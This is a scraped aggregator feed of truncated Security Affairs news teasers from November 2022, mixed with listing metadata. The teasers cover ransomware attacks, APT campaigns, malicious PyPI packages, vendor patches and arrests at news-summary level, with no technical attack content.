2022-11-15T10:16:53+00:00 https://securityaffairs.co/wordpress/138555/reports/google-settlement-personal-location-data.html www.secnews.physaphae.fr/article.php?IdArticle=8024597 False Guideline None None Security Affairs - Blog Secu Trend Micro reported that the Earth Longzhi group, a previously undocumented subgroup of APT41, targets Ukraine and Asian Countries. Early this year, Trend Micro investigated a security breach suffered by a company in Taiwan. Threat actors employed a custom Cobalt Strike loader in the attack. Further analysis, revealed that the same threat actor targeted multiple regions […] ]]> 2022-11-15T08:46:34+00:00 https://securityaffairs.co/wordpress/138536/apt/earth-longzhi-subgroup-apt41.html www.secnews.physaphae.fr/article.php?IdArticle=8023019 False Threat,Guideline APT 41 4.0000000000000000 Security Affairs - Blog Secu 2022-11-15T08:33:20+00:00 https://securityaffairs.co/wordpress/138550/apt/worok-apt-dropbox-api.html www.secnews.physaphae.fr/article.php?IdArticle=8023020 False None None 2.0000000000000000 Security Affairs - Blog Secu Researchers spotted a new evasive malware, tracked as KmsdBot, that infects systems via an SSH connection that uses weak credentials. Akamai Security Research discovered a new evasive Golang-based malware, tracked as KmsdBot, that infects systems via an SSH connection that uses weak login credentials. The malware was employed in cryptocurrency mining campaigns and to launch […] ]]> 2022-11-14T12:52:52+00:00 https://securityaffairs.co/wordpress/138514/malware/kmsdbot-golang-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8008611 False Malware None None Security Affairs - Blog Secu Russian threat actors employed a new ransomware family called Somnia in attacks against multiple organizations in Ukraine. The Government Computer Emergency Response Team of Ukraine CERT-UA is investigating multiple attacks against organizations in Ukraine that involved a new piece of ransomware called Somnia. Government experts attribute the attacks to the group ‘From Russia with Love’ […] ]]> 2022-11-14T09:18:41+00:00 https://securityaffairs.co/wordpress/138496/hacking/somnia-ransomware-attacks-ukraine.html www.secnews.physaphae.fr/article.php?IdArticle=8006318 False Ransomware,Threat None None Security Affairs - Blog Secu Are the directors of a company hit by a cyberattack liable for negligence in failing to take steps to limit the risk. As the risk of a cyberattack grows, it is pivotal to consider whether the directors of a company hit by a ransomware attack, for example, can bear any liability for negligence in failing […] ]]> 2022-11-14T09:12:55+00:00 https://securityaffairs.co/wordpress/138507/security/board-directors-liability-for-cyberattack.html www.secnews.physaphae.fr/article.php?IdArticle=8006319 False Ransomware None None Security Affairs - Blog Secu Ukraine’s Cyber ​​Police and Europol arrested 5 Ukrainian citizens who are members of a large-scale transnational fraud group. Ukraine’s cyber police and Europol arrested five members of a transnational fraud group that caused more than 200 million losses per year. The arrests are the results of a joint operation conducted with the support of law […] ]]> 2022-11-13T12:18:05+00:00 https://securityaffairs.co/wordpress/138481/cyber-crime/ukraine-police-dismantled-fraud-group.html www.secnews.physaphae.fr/article.php?IdArticle=7988784 False None None None Security Affairs - Blog Secu The Lockbit 3.0 ransomware gang started leaking the information allegedly stolen from the global high-tech company Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, essential […] ]]> 2022-11-13T09:40:52+00:00 https://securityaffairs.co/wordpress/138471/data-breach/lockbit-leaked-thales-files.html www.secnews.physaphae.fr/article.php?IdArticle=7986229 True Ransomware,Guideline None None Security Affairs - Blog Secu Crypto exchange FTX appears to have been hacked, rumors state that attackers stole $600 million drained from the company’s wallets. Crypto exchange FTX is recommending users to delete FTX apps and avoid using its website, a circumstance that refutes the rumors that the rumors of a $600 million crypto heist. The owners of several wallets […] ]]> 2022-11-12T17:37:30+00:00 https://securityaffairs.co/wordpress/138449/digital-id/ftx-alleged-hack.html www.secnews.physaphae.fr/article.php?IdArticle=7972966 False None None None Security Affairs - Blog Secu 2022-11-12T14:53:58+00:00 https://securityaffairs.co/wordpress/138440/malware/xenomorph-banking-malware-play-store.html www.secnews.physaphae.fr/article.php?IdArticle=7970365 False Malware None None Security Affairs - Blog Secu Sobeys, the second-largest supermarket chain in Canada, was he victim of a ransomware attack conducted by the Black Basta gang. Sobeys Inc. is the second largest supermarket chain in Canada, the company operates over 1,500 stores operating across Canada under a variety of banners. It is a wholly-owned subsidiary of Empire Company Limited, a Canadian business conglomerate. During […] ]]> 2022-11-12T11:35:10+00:00 https://securityaffairs.co/wordpress/138424/cyber-crime/sobeys-ransomware-attack.html www.secnews.physaphae.fr/article.php?IdArticle=7967758 False Ransomware None None Security Affairs - Blog Secu An initial access broker claims to have hacked Deutsche Bank and is offering access to its systems for sale on Telegram. A threat actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network for sale online. The security researcher Dominic Alvieri was one of the first experts […] ]]> 2022-11-11T23:07:47+00:00 https://securityaffairs.co/wordpress/138416/data-breach/deutsche-bank-alleged-data-breach.html www.secnews.physaphae.fr/article.php?IdArticle=7957229 False Threat None None Security Affairs - Blog Secu Lookout researchers discovered two long-running surveillance campaigns targeting the ethnic minority Uyghurs. Researchers from mobile security firm Lookout uncovered two long-running surveillance campaigns targeting the Uyghurs minority. The threat actors behind the campaigns used two Android spyware to spy on the victims and steal sensitive information. The campaigns involved a new piece of malware called […] ]]> 2022-11-11T21:07:03+00:00 https://securityaffairs.co/wordpress/138395/intelligence/uyghurs-badbazaar-moonshine-surveillance.html www.secnews.physaphae.fr/article.php?IdArticle=7955465 False Malware,Threat None None Security Affairs - Blog Secu The U.S. DoJ charged a Russian-Canadian national for his alleged role in LockBit ransomware attacks against organizations worldwide. The U.S. Department of Justice (DoJ) charged Mikhail Vasiliev, a dual Russian and Canadian national, for his alleged participation in the LockBit ransomware operation. According to the press release published by DoJ, the man is currently in custody in […] ]]> 2022-11-11T11:54:05+00:00 https://securityaffairs.co/wordpress/138381/cyber-crime/man-charged-lockbit-ransomware-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=7946486 False Ransomware None None Security Affairs - Blog Secu Google fixed a high-severity security bug affecting all Pixel smartphones that can allow attackers to unlock the devices. Google has addressed a high-severity security bug, tracked as CVE-2022-20465, affecting all Pixel smartphones that could be exploited to unlock the devices. The Google Pixel Lock Screen Bypass was reported by security researcher David Schütz that was […] ]]> 2022-11-11T10:04:15+00:00 https://securityaffairs.co/wordpress/138372/mobile-2/google-pixel-lock-screen-bypass.html www.secnews.physaphae.fr/article.php?IdArticle=7944634 False None None None Security Affairs - Blog Secu Microsoft linked Prestige ransomware attacks against organizations in Ukraine and Poland to Russia-linked threat actors. In Mid-October, Microsoft Threat Intelligence Center (MSTIC) researchers uncovered previously undetected ransomware, tracked as Prestige ransomware, employed in attacks targeting organizations in the transportation and related logistics industries in Ukraine and Poland. The Prestige ransomware first appeared in the threat […] ]]> 2022-11-11T08:28:28+00:00 https://securityaffairs.co/wordpress/138362/apt/prestige-ransomware-linked-iridium.html www.secnews.physaphae.fr/article.php?IdArticle=7943704 False Ransomware,Threat None None Security Affairs - Blog Secu Apple released out-of-band patches for iOS and macOS to fix a couple of code execution vulnerabilities in the libxml2 library. Apple released out-of-band patches for iOS and macOS to address two code execution flaws, tracked as CVE-2022-40303 and CVE-2022-40304, in the libxml2 library for parsing XML documents. The two vulnerabilities were discovered by Google Project […] ]]> 2022-11-10T21:26:48+00:00 https://securityaffairs.co/wordpress/138355/security/apple-out-of-band-patches.html www.secnews.physaphae.fr/article.php?IdArticle=7933511 False None None None Security Affairs - Blog Secu Experts discovered a malicious package on the Python Package Index (PyPI) that uses steganographic to hide malware within image files. CheckPoint researchers discovered a malicious package, named ‘apicolor,’ on the Python Package Index (PyPI) that uses steganographic to hide malware within image files. The malicious package infects PyPI users through open-source projects on Github.  The […] ]]> 2022-11-10T16:15:55+00:00 https://securityaffairs.co/wordpress/138342/security/malicious-package-pypi-steganography.html www.secnews.physaphae.fr/article.php?IdArticle=7928862 False Malware None None Security Affairs - Blog Secu A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code. Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil […] ]]> 2022-11-10T13:45:11+00:00 https://securityaffairs.co/wordpress/138331/security/abb-totalflow-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=7926063 False Vulnerability None 4.0000000000000000 Security Affairs - Blog Secu Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity. The attack stands out for the use of the Windows Credential […] ]]> 2022-11-10T10:41:13+00:00 https://securityaffairs.co/wordpress/138322/apt/apt29-windows-credential-roaming.html www.secnews.physaphae.fr/article.php?IdArticle=7923274 False None APT 29 None Security Affairs - Blog Secu Lenovo fixed two high-severity flaws impacting various laptop models that could allow an attacker to deactivate UEFI Secure Boot. Lenovo has released security updates to address a couple of high-severity vulnerabilities impacting various ThinkBook, IdeaPad, and Yoga laptop models. An attacker can exploit the flaws to disable UEFI Secure Boot. Secure Boot is a security feature […] ]]> 2022-11-10T07:21:53+00:00 https://securityaffairs.co/wordpress/138312/security/lenovo-bypass-security-features.html www.secnews.physaphae.fr/article.php?IdArticle=7920498 False None None None Security Affairs - Blog Secu Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits. Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that have been exploited by a surveillance company. The three issues are: The researchers pointed out that the surveillance firm included in its spyware the […] ]]> 2022-11-09T20:51:43+00:00 https://securityaffairs.co/wordpress/138302/hacking/surveillance-vendor-exploited-samsung-phone-zero-days.html www.secnews.physaphae.fr/article.php?IdArticle=7910819 False None None None Security Affairs - Blog Secu Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows […] ]]> 2022-11-09T13:31:43+00:00 https://securityaffairs.co/wordpress/138292/malware/amadey-malware-deploying-lockbit-3-0.html www.secnews.physaphae.fr/article.php?IdArticle=7905588 False Ransomware,Malware None None Security Affairs - Blog Secu Microsoft Patch Tuesday updates for November 2022 addressed 64 vulnerabilities, including six actively exploited zero-days. Microsoft Patch Tuesday updates for November 2022 addressed 64 new vulnerabilities in Microsoft Windows and Windows Components; Azure and Azure Real Time Operating System; Microsoft Dynamics; Exchange Server; Office and Office Components; SysInternals; Visual Studio; SharePoint Server; Network Policy Server […] ]]> 2022-11-09T11:54:36+00:00 https://securityaffairs.co/wordpress/138288/security/microsoft-patch-tuesday-november-2022.html www.secnews.physaphae.fr/article.php?IdArticle=7904157 False None None None Security Affairs - Blog Secu VMware address three critical bugs in the Workspace ONE Assist solution that allow remote attackers to bypass authentication and elevate privileges. VMware has released security updates to address three critical vulnerabilities impacting the Workspace ONE Assist product. Remote attackers can exploit the vulnerabilities to bypass authentication and elevate privileges to admin. Workspace ONE Assist allows […] ]]> 2022-11-09T08:47:31+00:00 https://securityaffairs.co/wordpress/138283/security/vmware-workspace-one-assist-critical-bugs.html www.secnews.physaphae.fr/article.php?IdArticle=7902137 False None None None Security Affairs - Blog Secu Citrix released security updates to address a critical authentication bypass vulnerability in Citrix ADC and Citrix Gateway. Citrix is urging customers to install security updates to address a critical authentication bypass issue, tracked as CVE-2022-27510, in Citrix ADC and Citrix Gateway. The company addressed the following three vulnerabilities: “Note that only appliances that are operating […] ]]> 2022-11-08T21:52:41+00:00 https://securityaffairs.co/wordpress/138264/security/citrix-gateway-adc-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=7894623 False Vulnerability None 4.0000000000000000 Security Affairs - Blog Secu Researchers observed a SmokeLoader campaign that is distributing a new clipper malware dubbed Laplas Clipper that targets cryptocurrency users. Cyble researchers uncovered a SmokeLoader campaign that is distributing community malware, such as SystemBC and Raccoon Stealer 2.0, along with a new clipper malware tracked as Laplas. The experts detected more than 180 different samples of the clipper […] ]]> 2022-11-08T18:22:33+00:00 https://securityaffairs.co/wordpress/138251/malware/smokeloader-delivers-laplas-clipper.html www.secnews.physaphae.fr/article.php?IdArticle=7892664 False Malware None None Security Affairs - Blog Secu 2022-11-08T09:45:36+00:00 https://securityaffairs.co/wordpress/138243/cyber-crime/medibank-confirms-ransomware-attack.html www.secnews.physaphae.fr/article.php?IdArticle=7887401 False Ransomware None None Security Affairs - Blog Secu The U.S. Department of Justice condemned James Zhong, a hacker who stole 50,000 bitcoins from the Silk Road dark net marketplace. The US Department of Justice announced that a man from Georgia, James Zhong, has pleaded guilty to wire fraud after stealing more than 50,000 bitcoins from the Silk Road. Zhong pled guilty to money […] ]]> 2022-11-08T08:15:03+00:00 https://securityaffairs.co/wordpress/138228/cyber-crime/silk-road-hacker-pleads-guilty.html www.secnews.physaphae.fr/article.php?IdArticle=7886950 False Guideline None None Security Affairs - Blog Secu 2022-11-07T19:52:34+00:00 https://securityaffairs.co/wordpress/138213/hacking/justice-blade-targets-saudi-arabia.html www.secnews.physaphae.fr/article.php?IdArticle=7883166 False Threat None None Security Affairs - Blog Secu The phishing-as-a-service (PhaaS) platform Robin Banks migrated its infrastructure to DDoS-Guard, a Russian bulletproof hosting service. The phishing-as-a-service (PhaaS) platform Robin Banks was originally hosted by Cloudflare provider, but the company in July disassociated Robin Banks phishing infrastructure from its services after being informed. The move caused a multi-day disruption to PhaaS operations, then the administrators […] ]]> 2022-11-07T18:00:06+00:00 https://securityaffairs.co/wordpress/138199/cyber-crime/robin-banks-phaas.html www.secnews.physaphae.fr/article.php?IdArticle=7882414 False None None None Security Affairs - Blog Secu Expert warns that the US and Israel are still unprepared to defeat a cyber attack against organizations in the water sector. Ariel Stern, a former Israeli Air Force captain, warns that the US and Israel are still unprepared to defeat a cyber attack against the water sector that could be orchestrated by enemy states like […] ]]> 2022-11-07T11:36:01+00:00 https://securityaffairs.co/wordpress/138185/hacking/water-sector-us-israel-cyberattacks.html www.secnews.physaphae.fr/article.php?IdArticle=7880030 False None None None Security Affairs - Blog Secu The UK National Cyber Security Centre (NCSC) announced that is scanning all Internet-exposed devices hosted in the UK for vulnerabilities. The United Kingdom’s National Cyber Security Centre (NCSC) is scanning all Internet-exposed devices hosted in the United Kingdom for vulnerabilities. The UK agency aims at secure these devices reporting the discovered vulnerabilities to their owners. […] ]]> 2022-11-07T07:33:17+00:00 https://securityaffairs.co/wordpress/138158/security/uk-ncsc-scans-internet.html www.secnews.physaphae.fr/article.php?IdArticle=7878695 False None None None Security Affairs - Blog Secu Researchers uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the victims. Microsoft’s Dynamics 365 Customer Voice product allows organizations to gain customer feedback, it is used to conduct customer satisfaction surveys. Researchers from cybersecurity firm Avanan, uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the […] ]]> 2022-11-07T06:05:45+00:00 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html www.secnews.physaphae.fr/article.php?IdArticle=7877739 False None None None Security Affairs - Blog Secu 2022-11-06T17:17:54+00:00 https://securityaffairs.co/wordpress/138136/cyber-crime/lockbit-ransomware-kearney-company.html www.secnews.physaphae.fr/article.php?IdArticle=7869382 False Ransomware None None Security Affairs - Blog Secu At the end of October, a cyber attack caused the trains to stop in Denmark, the attack hit a third-party IT service provider. A cyber attack caused training the trains operated by DSB to stop in Denmark the last weekend, threat actors hit a third-party IT service provider. The attack hit the Danish company Supeo […] ]]> 2022-11-06T13:51:03+00:00 https://securityaffairs.co/wordpress/138127/cyber-crime/cyberattack-blocked-trains-denmark.html www.secnews.physaphae.fr/article.php?IdArticle=7866186 False Threat None None Security Affairs - Blog Secu Cybersecurity researchers discovered 29 malicious PyPI packages delivering the W4SP stealer to developers’ systems. Cybersecurity researchers have discovered 29 packages in the official Python Package Index (PyPI) repository designed to infect developers’ systems with an info-stealing malware dubbed W4SP Stealer. “It appears that these packages are a more sophisticated attempt to deliver the W4SP Stealer on […] ]]> 2022-11-05T21:34:11+00:00 https://securityaffairs.co/wordpress/138113/hacking/pypi-packages-delivers-w4sp-stealer.html www.secnews.physaphae.fr/article.php?IdArticle=7852189 False Malware None None Security Affairs - Blog Secu Microsoft warns of an uptick among threat actors increasingly using publicly-disclosed zero-day exploits in their attacks. According to the Digital Defense Report published by Microsoft, threat actors are increasingly leveraging publicly-disclosed zero-day vulnerabilities to target organizations worldwide. The researchers noticed a reduction in the time between the announcement of a vulnerability and the commoditization of […] ]]> 2022-11-05T17:30:47+00:00 https://securityaffairs.co/wordpress/138100/security/treat-actors-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=7848503 False Vulnerability,Threat None None Security Affairs - Blog Secu A new campaign spreading RomCom RAT impersonates popular software brands like KeePass, and SolarWinds. The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution. Researchers from BlackBerry uncovered a new RomCom RAT campaign impersonating popular software brands like KeePass, and SolarWinds. […] ]]> 2022-11-04T13:51:55+00:00 https://securityaffairs.co/wordpress/138091/hacking/romcom-rat-campaigns.html www.secnews.physaphae.fr/article.php?IdArticle=7823119 True Threat None None Security Affairs - Blog Secu I'm proud to announce the release of the 10th edition of the ENISA Threat Landscape (ETL) on the state of the cybersecurity threat landscape. The Europen Agency for cybersecurity ENISA releases its ENISA Threat Landscape 2022 (ETL) report, which is the annual analysis of the state of the cybersecurity threat landscape. This is the 10th edition of the […] ]]> 2022-11-04T10:09:39+00:00 https://securityaffairs.co/wordpress/138077/security/enisa-threat-landscape-2022.html www.secnews.physaphae.fr/article.php?IdArticle=7820498 False Threat None None